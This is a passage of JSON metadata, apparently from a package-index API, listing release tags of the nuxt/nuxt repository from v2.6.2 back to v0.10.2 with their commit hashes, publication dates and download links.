ag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"c0776eb2d78f839d2b1249765d2eb117b5f32d2e","kind":"tag","published_at":"2019-04-04T17:58:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"0e51676731e975226a7135003b941b9077256641","kind":"tag","published_at":"2019-04-04T17:06:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"5d7757bf299c724bb52df529c5dbd1a341b19951","kind":"tag","published_at":"2019-03-21T21:48:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"e2c296321b8f70c3e977ed11a0825870a2cc528a","kind":"tag","published_at":"2019-03-21T13:07:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"0ad13e04d2cae232d807ba0dd100b8f3f7bbb010","kind":"commit","published_at":"2019-02-26T10:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5/manifests"},{"name":"v2.4.3","sha":"13e494c0f0013252994eb0de0c4d92bd507b119d","kind":"tag","published_at":"2019-02-06T15:56:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"32b0f155c97a5c7f7cb7cc450274e10a492c9c39","kind":"tag","published_at":"2019-01-30T15:15:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2/manifests"},{"name":"v2.4.0","sha":"5f221b4b7e39e4804bde682b2e71780a7a1e2845","kind":"tag","published_at":"2019-01-28T17:41:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0/manifests"},{"name":"v1.4.5","sha":"c8962964b8ced4c703804ed9cc5e54c6d486a321","kind":"tag","published_at":"2018-11-27T17:37:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5/manifests"},{"name":"v2.3.4","sha":"16c5b892fa3104992f3a6778ac97a0fcb1ca657c","kind":"tag","published_at":"2018-11-26T17:50:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4/manifests"},{"name":"v2.3.2","sha":"205c9d38156c60d93248b9d973a615eee7355f22","kind":"tag","published_at":"2018-11-20T20:49:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"f75a4423354f16603a6b733ca12d873e501f4442","kind":"tag","published_at":"2018-11-16T19:28:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1/manifests"},{"name":"v1.4.4","sha":"8fb8376ff70b9db5feda4492009b0fb7d3e2884a","kind":"tag","published_at":"2018-10-19T14:00:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"f5aff938f7742624708b4eecc7a2b003c1a1d161","kind":"tag","published_at":"2018-10-19T13:45:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3/manifests"},{"name":"v2.3.0","sha":"dbf3ccc4c142083a76fbc4f3281f04e9b3044b79","kind":"commit","published_at":"2018-10-17T21:35:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"e3b72ded5c56b62ca25f180390a1d60ce8123b5b","kind":"tag","published_at":"2018-10-13T19:07:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"fdb225fbeb452a421f1484e3a1a16f26952d386e","kind":"tag","published_at":"2018-09-30T16:28:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"7a68e1dde17e0ed7eb7598d9c63ca1ac2383b76e","kind":"commit","published_at":"2018-09-20T21:57:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0/manifests"},{"name":"v1.4.2","sha":"376dd35ba9465e1163a800bd0512654f68436b5f","kind":"tag","published_at":"2018-08-01T19:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2/manifests"},{"name":"v1.4.1","sha":"5b7e27a1af4aa0d212766513693949f9d7917bd5","kind":"tag","published_at":"2018-06-06T13:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"85b584693cd1e689406ad722b47735fa7d0faf26","kind":"tag","published_at":"2018-03-01T16:45:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0/manifests"},{"name":"v1.3.0","sha":"1582df149d7f18402faa58c47e080e3f0cc52a16","kind":"tag","published_at":"2018-01-31T16:13:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"f0bd9a573b3756a6f878b3964222679a8c58beaa","kind":"tag","published_at":"2018-01-26T12:24:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"78494dac927681007ea6725b4548db8fd838ed16","kind":"tag","published_at":"2018-01-26T11:54:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0/manifests"},{"name":"v1.1.1","sha":"6dce671498d0128662579cfb08dd7e3e67253261","kind":"tag","published_at":"2018-01-13T13:10:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0/manifests"},{"name":"v1.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1/manifests"},{"name":"v1.0.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"b83d74588fa45018dd89bb6ab4b4305be7f6a50a","kind":"tag","published_at":"2018-01-08T16:07:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc11","sha":"034df15231fa7986cf626ccc48305a0ba0a6cba2","kind":"commit","published_at":"2017-09-07T12:53:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"e24b4a7cc59e1b56b2a748682aa9180cd881097f","kind":"commit","published_at":"2017-09-07T12:31:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"226a8701b4f18cf213adb8f474c052adf2376ded","kind":"commit","published_at":"2017-09-06T13:34:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"63bc512d73660986546bd2428649d0299a6a0abd","kind":"commit","published_at":"2017-08-30T16:36:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"138edc7bfdbc9617a3f4e245f9bd32d0fcfc3a2b","kind":"commit","published_at":"2017-08-29T12:04:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"b931dd40cea828021f3092d1e224053a1baacba0","kind":"commit","published_at":"2017-08-21T20:08:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"e34d9d69bb44301976e1ee78fcd454b904f7701a","kind":"commit","published_at":"2017-08-21T08:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc3","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc4","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4/manifests"},{"name":"1.0.0-rc3","sha":"8563c0f05fca617eb296544ac1f84f96cf470c5f","kind":"commit","published_at":"2017-07-28T08:40:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3/manifests"},{"name":"v1.0.0-alpha.4","sha":"d15a50f539e74a510353d06e9a247e5cec77850e","kind":"commit","published_at":"2017-06-06T12:57:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4/manifests"},{"name":"v1.0.0-alpha.3","sha":"2f32d03f83de48fc13718815e38197446d538b5e","kind":"commit","published_at":"2017-06-04T12:11:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3/manifests"},{"name":"v1.0.0-alpha2","sha":"03f2e133b140d78870971ad4eadd00f14c244a2c","kind":"commit","published_at":"2017-05-29T15:04:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2/manifests"},{"name":"v1.0.0-alpha1","sha":"7f337cdadf6e2b7b4b1a2b9f549c19aac33a794d","kind":"commit","published_at":"2017-05-21T19:08:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1/manifests"},{"name":"v0.10.7","sha":"5d4f2899110b061ca8e084354e1a8b400280df14","kind":"commit","published_at":"2017-04-29T23:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7/manifests"},{"name":"v0.10.6","sha":"854e262445db60f8bfee2483e3e723b7be4dc35a","kind":"commit","published_at":"2017-04-17T13:58:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6/manifests"},{"name":"v0.10.5","sha":"704ff5e5775736cfe0e7030cbdc0b9cc2cb198d3","kind":"commit","published_at":"2017-03-25T23:54:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5/manifests"},{"name":"v0.10.4","sha":"5ff6424e09eb2262b975c9c544c57e681fbf7591","kind":"commit","published_at":"2017-03-25T18:03:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4/manifests"},{"name":"v0.10.3","sha":"c9784651e9c482ad90ec9c39359ac9dfd1e199bf","kind":"commit","published_at":"2017-03-25T11:57:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"77439223cfb9d3c64928d8888113898f4b1fa5d3","kind":"commit","published_at":"2017-03-25T11:36:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0